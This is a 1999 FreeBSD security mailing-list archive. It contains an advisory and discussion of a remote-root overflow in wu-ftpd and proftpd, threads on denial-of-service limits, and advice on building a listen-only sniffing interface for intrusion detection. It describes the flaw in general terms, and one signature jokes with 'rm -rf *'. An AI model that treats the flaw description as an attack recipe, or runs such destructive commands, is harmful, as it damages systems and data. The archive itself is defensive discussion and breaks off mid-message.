=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D > =3D > FreeBSD-SA-99:03 Security > Advisory > FreeBSD, > Inc. >=20 > Topic: Two ftp daemons in ports vulnerable to attack. >=20 > Category: ports > Module: wu-ftpd and proftpd > Announced: 1999-09-05 > Affects: FreeBSD 3.2 (and earlier) > FreeBSD-current before the correction date. > Corrected: FreeBSD-3.3 RELEASE > FreeBSD-current as of 1999/08/30 > FreeBSD only: NO >=20 > Patches: NONE >=20 > I. Background =20 >=20 > wuftpd and proftpd have a flaw which can lead to a remote root > compromise. They are both vulnerable since they are both based on a > code base that is vulnerable. >=20 > II. Problem Description >=20 > Remote users can gain root via a buffer overflow. >=20 > III. Impact >=20 > Remote users can gain root. >=20 > IV. Workaround >=20 > Disable the ftp daemon until you can upgrade your system. >=20 > V. Solution >=20 > Upgrade your wu-ftpd or proftpd ports to the most recent versions (any > version after August 30, 1999 is not impacted by this problem). If > you are running non-port versions, you should verify that your version > is not vulnerable or upgrade to using the ports version of these > programs. >=20 > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D > =3D > FreeBSD, Inc. >=20 > Web Site: http://www.freebsd.org/ > Confidential contacts: security-officer@freebsd.org > Security notifications: security-notifications@freebsd.org > Security public discussion: freebsd-security@freebsd.org > PGP Key: > ftp://ftp.freebsd.org/pub/FreeBSD/CERT/public_key.asc >=20 > Notice: Any patches in this document may not apply cleanly due to > modifications caused by digital signature or mailer software. > Please reference the URL listed at the top of this document > for original copies of all patches if necessary. > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D > =3D >=20 >=20 >=20 > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message >=20 >=20 >=20 >=20 > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message --=20 ------------------------------------------------------------------- Ron Rosson ... and a UNIX user said ... The InSaNe One rm -rf * insane@oneinsane.net and all was null and void ------------------------------------------------------------------- Practice random acts of intelligence and senseless acts of self-control. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 9 6:44:46 1999 Delivered-To: freebsd-security@freebsd.org Received: from caladan.tdx.co.uk (caladan.tdx.co.uk [195.188.177.4]) by hub.freebsd.org (Postfix) with ESMTP id 8DC71152AD; Thu, 9 Sep 1999 06:44:31 -0700 (PDT) (envelope-from kpielorz@tdx.co.uk) Received: from tdx.co.uk (lorca-tx.tdx.co.uk [195.188.177.242]) by caladan.tdx.co.uk (8.9.3/8.9.3/Kp) with ESMTP id OAA56075; Thu, 9 Sep 1999 14:43:26 +0100 (BST) Message-ID: <37D7B90D.B252B4E6@tdx.co.uk> Date: Thu, 09 Sep 1999 14:41:33 +0100 From: Karl Pielorz Organization: TDX - The Digital eXchange X-Mailer: Mozilla 4.61 [en] (WinNT; I) X-Accept-Language: en MIME-Version: 1.0 To: Darren Reed Cc: Stas Kisel , freebsd-hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: mbuf shortage situations References: <199909091315.XAA05192@cheops.anu.edu.au> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Darren Reed wrote: > > It is evil connection. Good applications do read data from their sockets, > > and evil ones do not. And ever if it is good, but silly or busy > > application, good clients do not send so much data that application > > can not process it. Am I wrong, there are any examples? > > So what if someone manages to crash a program due to a DOS attack ? > An easy one that comes to mind is syslogd. It's often stuck in disk-wait > and can easily be targetted with a large number of packets. Isn't syslog UDP? - i.e. no ACK? - you could argue (to a point) that this might even be by design? :) (with regard to if syslog is in diskwait, and over burdened with traffic, data gets dropped). This, could be construed as a DoS (in fact it probably is)... If you look to real life, not many systems are DoS proof - Most real life scenarios work by detection and subsequent action, e.g. if you start calling the firemen out all over town (DoS'ing the fire service) - you will hopefully be detected, and removed :) You could try to prevent this, by having say limits on buffers per process, or through something like Inetd (i.e. throttling). You could even take Inetd a stage further and say "if excessive from same IP, stop responding to that IP for 'x' time), but even then people who are determined will only (and easily with the current Internet) start launching multi-homed attack's DoS's etc. How long before servers only accept connections from hosts presenting a valid 'certificate'? - How long until the certificates themselves are forged? At the end of the day, you have 1 box with limited resources - trying to handle the situation. Even if it's well behaved (doesn't crash) - something has to give, i.e. the service may shutdown for a while. The sad fact is, this is exactly what a DoS is trying to achieve, and will achieve until some intervening action is taken, you can only slow & detect it - you can't readily stop it - there is no 'easy' fix for this... [You could argue, SysAdmin's are a fix? No?] Just my $0.02+1's worth -Karl To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 9 6:58:24 1999 Delivered-To: freebsd-security@freebsd.org Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by hub.freebsd.org (Postfix) with ESMTP id 366DB14D85; Thu, 9 Sep 1999 06:58:13 -0700 (PDT) (envelope-from avalon@cheops.anu.edu.au) Received: (from avalon@localhost) by cheops.anu.edu.au (8.9.1/8.9.1) id XAA05823; Thu, 9 Sep 1999 23:56:58 +1000 (EST) From: Darren Reed Message-Id: <199909091356.XAA05823@cheops.anu.edu.au> Subject: Re: mbuf shortage situations To: kpielorz@tdx.co.uk (Karl Pielorz) Date: Thu, 9 Sep 1999 23:56:57 +1000 (EST) Cc: avalon@coombs.anu.edu.au, stas@sonet.crimea.ua, freebsd-hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG In-Reply-To: <37D7B90D.B252B4E6@tdx.co.uk> from "Karl Pielorz" at Sep 9, 99 02:41:33 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In some mail from Karl Pielorz, sie said: > > Darren Reed wrote: > > > > It is evil connection. Good applications do read data from their sockets, > > > and evil ones do not. And ever if it is good, but silly or busy > > > application, good clients do not send so much data that application > > > can not process it. Am I wrong, there are any examples? > > > > So what if someone manages to crash a program due to a DOS attack ? > > An easy one that comes to mind is syslogd. It's often stuck in disk-wait > > and can easily be targetted with a large number of packets. > > Isn't syslog UDP? - i.e. no ACK? - you could argue (to a point) that this > might even be by design? :) (with regard to if syslog is in diskwait, and over > burdened with traffic, data gets dropped). This, could be construed as a DoS > (in fact it probably is)... sorry, syslogd doesn't suffer from the same problems that klogd on lamix does (i.e its all datagrams). my mistake. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 9 6:59:17 1999 Delivered-To: freebsd-security@freebsd.org Received: from sentry.granch.ru (sentry.granch.ru [212.20.5.135]) by hub.freebsd.org (Postfix) with ESMTP id 0E35014CCF for ; Thu, 9 Sep 1999 06:59:12 -0700 (PDT) (envelope-from shelton@sentry.granch.ru) Received: from localhost (IDENT:shelton@localhost.granch.ru [127.0.0.1]) by sentry.granch.ru (8.9.3/8.9.3) with ESMTP id UAA59549; Thu, 9 Sep 1999 20:54:09 +0700 (NOVST) Date: Thu, 9 Sep 1999 20:54:08 +0700 (NOVST) From: "Rashid N. Achilov" To: Ruslan Ermilov Cc: Bill Fink , security@FreeBSD.ORG Subject: Re: FTP Vulnerability In-Reply-To: <19990909162255.A15548@relay.ucb.crimea.ua> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 9 Sep 1999, Ruslan Ermilov wrote: > > I've visited the mirrors for the WUFTP site(s) looking for the versions > > "after August 30" and there's NOTHING newer than MAY. > > > The versions we are talking about refer to the FreeBSD ports collection. > Port of wu-ftpd (/usr/ports/net/wu-ftpd) has been upgraded to apply the > following patch: > > ftp://ftp.wu-ftpd.org/pub/wu-ftpd/quickfixes/apply_to_2.5.0/mapped.path.overrun.patch On this site mapped.overrun... dated August,24. In ports tree in patches subdir newest patch dated April,7 :-) With Best Regards. Rashid N. Achilov (RNA1-RIPE), Cert. ID: 28514, Granch Ltd. lead engineer e-mail: achilov@granch.ru, tel (383-2) 24-2363 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 9 7:17: 8 1999 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 7D9F614D85 for ; Thu, 9 Sep 1999 07:16:59 -0700 (PDT) (envelope-from des@flood.ping.uio.no) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id QAA00618; Thu, 9 Sep 1999 16:14:59 +0200 (CEST) (envelope-from des) To: "Lowkrantz, Goran" Cc: freebsd-security@FreeBSD.ORG Subject: Re: Lisen only NIC References: From: Dag-Erling Smorgrav Date: 09 Sep 1999 16:14:59 +0200 In-Reply-To: "Lowkrantz, Goran"'s message of "Thu, 9 Sep 1999 10:37:07 +0200" Message-ID: Lines: 9 X-Mailer: Gnus v5.5/Emacs 19.34 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "Lowkrantz, Goran" writes: > 1 - Is it possible to configure a NIC this way? # ifconfig ed0 up # tcpdump DES -- Dag-Erling Smorgrav - des@flood.ping.uio.no To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 9 7:18:26 1999 Delivered-To: freebsd-security@freebsd.org Received: from relay.ucb.crimea.ua (relay.ucb.crimea.ua [212.110.138.1]) by hub.freebsd.org (Postfix) with ESMTP id 2AAE41594B for ; Thu, 9 Sep 1999 07:17:29 -0700 (PDT) (envelope-from ru@ucb.crimea.ua) Received: (from ru@localhost) by relay.ucb.crimea.ua (8.9.3/8.9.3/UCB) id RAA57065; Thu, 9 Sep 1999 17:09:40 +0300 (EEST) (envelope-from ru) Date: Thu, 9 Sep 1999 17:09:40 +0300 From: Ruslan Ermilov To: "Rashid N. Achilov" Cc: Bill Fink , security@FreeBSD.ORG Subject: Re: FTP Vulnerability Message-ID: <19990909170940.B51179@relay.ucb.crimea.ua> Mail-Followup-To: "Rashid N. Achilov" , Bill Fink , security@FreeBSD.ORG References: <19990909162255.A15548@relay.ucb.crimea.ua> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.3i In-Reply-To: ; from Rashid N. Achilov on Thu, Sep 09, 1999 at 08:54:08PM +0700 X-Operating-System: FreeBSD 3.2-STABLE i386 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Sep 09, 1999 at 08:54:08PM +0700, Rashid N. Achilov wrote: > On Thu, 9 Sep 1999, Ruslan Ermilov wrote: > > > > I've visited the mirrors for the WUFTP site(s) looking for the versions > > > "after August 30" and there's NOTHING newer than MAY. > > > > > The versions we are talking about refer to the FreeBSD ports collection. > > Port of wu-ftpd (/usr/ports/net/wu-ftpd) has been upgraded to apply the > > following patch: > > > > ftp://ftp.wu-ftpd.org/pub/wu-ftpd/quickfixes/apply_to_2.5.0/mapped.path.overrun.patch > > On this site mapped.overrun... dated August,24. > In ports tree in patches subdir newest patch dated April,7 :-) > Grr... Advisory refers to version of the FreeBSD port after 1999/08/30: :RCS file: /home/ncvs/ports/ftp/wu-ftpd/Makefile,v :head: 1.30 :---------------------------- :revision 1.29 :date: 1999/08/30 19:14:03; author: cpiazza; state: Exp; lines: +4 -1 ^^^^^^^^^^ :Add a PATCH_FILE to close a security hole in wu-ftpd. : :Quoted from wu-ftpd group's accouncement: : : Due to insufficient bounds checking on directory name lengths which can : be supplied by users, it is possible to overwrite the static memory : space of the wu-ftpd daemon while it is executing under certain : configurations. By having the ability to create directories and : supplying carefully designed directory names to the wu-ftpd, users may : gain privileged access. : :PR: 13475 :Submitted by: jack@germanium.xtalwind.net :============================================================================= -- Ruslan Ermilov Sysadmin and DBA of the ru@ucb.crimea.ua United Commercial Bank, ru@FreeBSD.org FreeBSD committer, +380.652.247.647 Simferopol, Ukraine http://www.FreeBSD.org The Power To Serve http://www.oracle.com Enabling The Information Age To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 9 7:24:43 1999 Delivered-To: freebsd-security@freebsd.org Received: from ns2.infologigruppen.se (ns2.infologigruppen.se [212.214.163.69]) by hub.freebsd.org (Postfix) with ESMTP id 9C59214E0B for ; Thu, 9 Sep 1999 07:24:39 -0700 (PDT) (envelope-from Goran.Lowkrantz@infologigruppen.se) Received: (from uucp@localhost) by ns2.infologigruppen.se (8.9.2/8.8.8) id QAA05842; Thu, 9 Sep 1999 16:23:16 +0200 (CEST) (envelope-from Goran.Lowkrantz@infologigruppen.se) Received: from valhall.ign.se(192.168.3.1) via SMTP by bifrost-net.ign.se, id smtpdUM5840; Thu Sep 9 16:23:08 1999 Received: by valhall.ign.se with Internet Mail Service (5.5.2448.0) id ; Thu, 9 Sep 1999 16:23:08 +0200 Message-ID: From: "Lowkrantz, Goran" To: "'Mark Newton'" , "Lowkrantz, Goran" Cc: freebsd-security@FreeBSD.ORG Subject: RE: Lisen only NIC Date: Thu, 9 Sep 1999 16:23:04 +0200 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2448.0) Content-Type: text/plain; charset="windows-1252" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Yes! -----Original Message----- From: Mark Newton [mailto:newton@atdot.dotat.org] Sent: Thursday, September 09, 1999 4:15 PM To: Goran.Lowkrantz@infologigruppen.se Cc: freebsd-security@FreeBSD.ORG Subject: Re: Lisen only NIC Lowkrantz, Goran wrote: > To check on our DMZs I am building a monitor system with a protected > interface connected to the internal network and a multiport card to monitor > the consoles of the systems in the DMZs. To check for attacks I have setup > Snort and have tested with the Vision IDS but I want to hide the network > interface completely so that it can't be seen or heard or attacked or > anything. Cut the transmit pin on your patchlead. - mark -------------------------------------------------------------------- I tried an internal modem, newton@atdot.dotat.org but it hurt when I walked. Mark Newton ----- Voice: +61-4-1620-2223 ------------- Fax: +61-8-82231777 ----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 9 7:33:39 1999 Delivered-To: freebsd-security@freebsd.org Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by hub.freebsd.org (Postfix) with ESMTP id 7948D14ECE for ; Thu, 9 Sep 1999 07:33:22 -0700 (PDT) (envelope-from avalon@cheops.anu.edu.au) Received: (from avalon@localhost) by cheops.anu.edu.au (8.9.1/8.9.1) id AAA06424; Fri, 10 Sep 1999 00:34:09 +1000 (EST) From: Darren Reed Message-Id: <199909091434.AAA06424@cheops.anu.edu.au> Subject: Re: Lisen only NIC To: Goran.Lowkrantz@infologigruppen.se (Lowkrantz, Goran) Date: Fri, 10 Sep 1999 00:34:08 +1000 (EST) Cc: newton@atdot.dotat.org, Goran.Lowkrantz@infologigruppen.se, freebsd-security@FreeBSD.ORG In-Reply-To: from "Lowkrantz, Goran" at Sep 9, 99 04:23:04 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Err, this can do bad things like make your hub/switch think your station has dropped off the network and hence get 0 packets. In some mail from Lowkrantz, Goran, sie said: > > Yes! > > -----Original Message----- > From: Mark Newton [mailto:newton@atdot.dotat.org] > Sent: Thursday, September 09, 1999 4:15 PM > To: Goran.Lowkrantz@infologigruppen.se > Cc: freebsd-security@FreeBSD.ORG > Subject: Re: Lisen only NIC > > > Lowkrantz, Goran wrote: > > > To check on our DMZs I am building a monitor system with a protected > > interface connected to the internal network and a multiport card to > monitor > > the consoles of the systems in the DMZs. To check for attacks I have > setup > > Snort and have tested with the Vision IDS but I want to hide the network > > interface completely so that it can't be seen or heard or attacked or > > anything. > > Cut the transmit pin on your patchlead. > > - mark > > -------------------------------------------------------------------- > I tried an internal modem, newton@atdot.dotat.org > but it hurt when I walked. Mark Newton > ----- Voice: +61-4-1620-2223 ------------- Fax: +61-8-82231777 ----- > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 9 7:38:14 1999 Delivered-To: freebsd-security@freebsd.org Received: from ns2.infologigruppen.se (ns2.infologigruppen.se [212.214.163.69]) by hub.freebsd.org (Postfix) with ESMTP id C9741154F8 for ; Thu, 9 Sep 1999 07:38:10 -0700 (PDT) (envelope-from Goran.Lowkrantz@infologigruppen.se) Received: (from uucp@localhost) by ns2.infologigruppen.se (8.9.2/8.8.8) id QAA05856; Thu, 9 Sep 1999 16:37:06 +0200 (CEST) (envelope-from Goran.Lowkrantz@infologigruppen.se) Received: from valhall.ign.se(192.168.3.1) via SMTP by bifrost-net.ign.se, id smtpdaC5854; Thu Sep 9 16:36:56 1999 Received: by valhall.ign.se with Internet Mail Service (5.5.2448.0) id ; Thu, 9 Sep 1999 16:36:56 +0200 Message-ID: From: "Lowkrantz, Goran" To: "'Dag-Erling Smorgrav'" , "Lowkrantz, Goran" Cc: freebsd-security@FreeBSD.ORG Subject: RE: Lisen only NIC Date: Thu, 9 Sep 1999 16:36:54 +0200 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2448.0) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Thanks, but this don't work vith snort, it want's an IP address of dies ERROR: OpenPcap() device ep1 network lookup: SIOCGIFADDR: ep1: Can't assign requested address Cheers, GLZ -----Original Message----- From: Dag-Erling Smorgrav [mailto:des@flood.ping.uio.no] Sent: Thursday, September 09, 1999 4:15 PM To: Lowkrantz, Goran Cc: freebsd-security@FreeBSD.ORG Subject: Re: Lisen only NIC "Lowkrantz, Goran" writes: > 1 - Is it possible to configure a NIC this way? # ifconfig ed0 up # tcpdump DES -- Dag-Erling Smorgrav - des@flood.ping.uio.no To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 9 7:39:36 1999 Delivered-To: freebsd-security@freebsd.org Received: from ns2.infologigruppen.se (ns2.infologigruppen.se [212.214.163.69]) by hub.freebsd.org (Postfix) with ESMTP id A174C15BF4 for ; Thu, 9 Sep 1999 07:39:31 -0700 (PDT) (envelope-from Goran.Lowkrantz@infologigruppen.se) Received: (from uucp@localhost) by ns2.infologigruppen.se (8.9.2/8.8.8) id QAA05861; Thu, 9 Sep 1999 16:38:16 +0200 (CEST) (envelope-from Goran.Lowkrantz@infologigruppen.se) Received: from valhall.ign.se(192.168.3.1) via SMTP by bifrost-net.ign.se, id smtpdEU5859; Thu Sep 9 16:38:07 1999 Received: by valhall.ign.se with Internet Mail Service (5.5.2448.0) id ; Thu, 9 Sep 1999 16:38:07 +0200 Message-ID: From: "Lowkrantz, Goran" To: "'Darren Reed'" , "Lowkrantz, Goran" Cc: newton@atdot.dotat.org, "Lowkrantz, Goran" , freebsd-security@FreeBSD.ORG Subject: RE: Lisen only NIC Date: Thu, 9 Sep 1999 16:37:56 +0200 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2448.0) Content-Type: text/plain; charset="windows-1252" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Sorry, I forgot the smiley. Cheers, GLZ -----Original Message----- From: Darren Reed [mailto:avalon@coombs.anu.edu.au] Sent: Thursday, September 09, 1999 4:34 PM To: Goran.Lowkrantz@infologigruppen.se Cc: newton@atdot.dotat.org; Goran.Lowkrantz@infologigruppen.se; freebsd-security@FreeBSD.ORG Subject: Re: Lisen only NIC Err, this can do bad things like make your hub/switch think your station has dropped off the network and hence get 0 packets. In some mail from Lowkrantz, Goran, sie said: > > Yes! > > -----Original Message----- > From: Mark Newton [mailto:newton@atdot.dotat.org] > Sent: Thursday, September 09, 1999 4:15 PM > To: Goran.Lowkrantz@infologigruppen.se > Cc: freebsd-security@FreeBSD.ORG > Subject: Re: Lisen only NIC > > > Lowkrantz, Goran wrote: > > > To check on our DMZs I am building a monitor system with a protected > > interface connected to the internal network and a multiport card to > monitor > > the consoles of the systems in the DMZs. To check for attacks I have > setup > > Snort and have tested with the Vision IDS but I want to hide the network > > interface completely so that it can't be seen or heard or attacked or > > anything. > > Cut the transmit pin on your patchlead. > > - mark > > -------------------------------------------------------------------- > I tried an internal modem, newton@atdot.dotat.org > but it hurt when I walked. Mark Newton > ----- Voice: +61-4-1620-2223 ------------- Fax: +61-8-82231777 ----- > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 9 7:47:10 1999 Delivered-To: freebsd-security@freebsd.org Received: from oskar.nanoteq.co.za (oskar.nanoteq.co.za [196.37.91.10]) by hub.freebsd.org (Postfix) with ESMTP id 90DC115CF8 for ; Thu, 9 Sep 1999 07:46:35 -0700 (PDT) (envelope-from rbezuide@oskar.nanoteq.co.za) Received: (from rbezuide@localhost) by oskar.nanoteq.co.za (8.9.0/8.9.0) id QAA13441; Thu, 9 Sep 1999 16:46:57 +0200 (SAT) From: Reinier Bezuidenhout Message-Id: <199909091446.QAA13441@oskar.nanoteq.co.za> Subject: Re: Lisen only NIC In-Reply-To: <199909091434.AAA06424@cheops.anu.edu.au> from Darren Reed at "Sep 10, 99 00:34:08 am" To: avalon@coombs.anu.edu.au (Darren Reed) Date: Thu, 9 Sep 1999 16:46:55 +0200 (SAT) Cc: Goran.Lowkrantz@infologigruppen.se, newton@atdot.dotat.org, freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL28 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Err, this can do bad things like make your hub/switch think your station > has dropped off the network and hence get 0 packets. Yep ... this is true ... we've tried it before and failed :) The other thing todo is to try and remove the transmit code from the card driver :) Reinier To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 9 7:48:47 1999 Delivered-To: freebsd-security@freebsd.org Received: from atdot.dotat.org (atdot.dotat.org [150.101.89.3]) by hub.freebsd.org (Postfix) with ESMTP id B343414F57 for ; Thu, 9 Sep 1999 07:48:41 -0700 (PDT) (envelope-from newton@atdot.dotat.org) Received: (from newton@localhost) by atdot.dotat.org (8.9.3/8.7) id XAA72769; Thu, 9 Sep 1999 23:45:08 +0930 (CST) From: Mark Newton Message-Id: <199909091415.XAA72769@atdot.dotat.org> Subject: Re: Lisen only NIC To: Goran.Lowkrantz@infologigruppen.se (Lowkrantz, Goran) Date: Thu, 9 Sep 1999 23:45:07 +0930 (CST) Cc: freebsd-security@FreeBSD.ORG In-Reply-To: from "Lowkrantz, Goran" at Sep 9, 99 10:37:07 am X-Mailer: ELM [version 2.4 PL25] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Lowkrantz, Goran wrote: > To check on our DMZs I am building a monitor system with a protected > interface connected to the internal network and a multiport card to monitor > the consoles of the systems in the DMZs. To check for attacks I have setup > Snort and have tested with the Vision IDS but I want to hide the network > interface completely so that it can't be seen or heard or attacked or > anything. Cut the transmit pin on your patchlead. - mark -------------------------------------------------------------------- I tried an internal modem, newton@atdot.dotat.org but it hurt when I walked. Mark Newton ----- Voice: +61-4-1620-2223 ------------- Fax: +61-8-82231777 ----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 9 7:48:56 1999 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 8583515D92 for ; Thu, 9 Sep 1999 07:48:44 -0700 (PDT) (envelope-from des@flood.ping.uio.no) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id QAA00875; Thu, 9 Sep 1999 16:47:00 +0200 (CEST) (envelope-from des) To: "Lowkrantz, Goran" Cc: "'Dag-Erling Smorgrav'" , freebsd-security@FreeBSD.ORG Subject: Re: Lisen only NIC References: From: Dag-Erling Smorgrav Date: 09 Sep 1999 16:46:59 +0200 In-Reply-To: "Lowkrantz, Goran"'s message of "Thu, 9 Sep 1999 16:36:54 +0200" Message-ID: Lines: 9 X-Mailer: Gnus v5.5/Emacs 19.34 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "Lowkrantz, Goran" writes: > Thanks, but this don't work vith snort, it want's an IP address of dies Well, then, use a NIC with an AUI port and cut the TX pin in the tranceiver. DES -- Dag-Erling Smorgrav - des@flood.ping.uio.no To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 9 7:51:35 1999 Delivered-To: freebsd-security@freebsd.org Received: from ns2.infologigruppen.se (ns2.infologigruppen.se [212.214.163.69]) by hub.freebsd.org (Postfix) with ESMTP id 35409153F1 for ; Thu, 9 Sep 1999 07:51:27 -0700 (PDT) (envelope-from Goran.Lowkrantz@infologigruppen.se) Received: (from uucp@localhost) by ns2.infologigruppen.se (8.9.2/8.8.8) id QAA05876; Thu, 9 Sep 1999 16:48:47 +0200 (CEST) (envelope-from Goran.Lowkrantz@infologigruppen.se) Received: from valhall.ign.se(192.168.3.1) via SMTP by bifrost-net.ign.se, id smtpdTU5874; Thu Sep 9 16:48:46 1999 Received: by valhall.ign.se with Internet Mail Service (5.5.2448.0) id ; Thu, 9 Sep 1999 16:48:46 +0200 Message-ID: From: "Lowkrantz, Goran" To: "'Reinier Bezuidenhout'" , avalon@coombs.anu.edu.au Cc: "Lowkrantz, Goran" , newton@atdot.dotat.org, freebsd-security@FreeBSD.ORG Subject: RE: Lisen only NIC Date: Thu, 9 Sep 1999 16:48:40 +0200 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2448.0) Content-Type: text/plain; charset="windows-1252" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Couldn't this work if this NIC with the no-TX cable was using the same IP address as another, active computer on the same segment? GLZ -----Original Message----- From: Reinier Bezuidenhout [mailto:rbezuide@oskar.nanoteq.co.za] Sent: Thursday, September 09, 1999 4:47 PM To: avalon@coombs.anu.edu.au Cc: Goran.Lowkrantz@infologigruppen.se; newton@atdot.dotat.org; freebsd-security@FreeBSD.ORG Subject: Re: Lisen only NIC > Err, this can do bad things like make your hub/switch think your station > has dropped off the network and hence get 0 packets. Yep ... this is true ... we've tried it before and failed :) The other thing todo is to try and remove the transmit code from the card driver :) Reinier To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 9 7:57: 2 1999 Delivered-To: freebsd-security@freebsd.org Received: from drawbridge.ctc.com (drawbridge.ctc.com [147.160.99.35]) by hub.freebsd.org (Postfix) with ESMTP id AE9851564E for ; Thu, 9 Sep 1999 07:56:59 -0700 (PDT) (envelope-from cameron@ctc.com) Received: by drawbridge.ctc.com; id KAA25070; Thu, 9 Sep 1999 10:55:54 -0400 (EDT) Received: from server2.ctc.com(147.160.1.4) by drawbridge.ctc.com via smap (V2.0) id xma025046; Thu, 9 Sep 99 10:55:34 -0400 Received: from ctcjst-mail1.ctc.com (ctcjst-mail1.ctc.com [147.160.34.4]) by server2.ctc.com (980427.SGI.8.8.8/970903.SGI.AUTOCF) via ESMTP id KAA23859; Thu, 9 Sep 1999 10:55:33 -0400 (EDT) Received: by ctcjst-mail1.ctc.com with Internet Mail Service (5.5.2448.0) id ; Thu, 9 Sep 1999 10:55:12 -0400 Message-ID: <0C0F7D2A7354D311B79100A0C9EA54E12F6F6F@ctcjst-mail1.ctc.com> From: "Cameron, Frank" To: "'freebsd-security@freebsd.org'" Cc: "'Darren 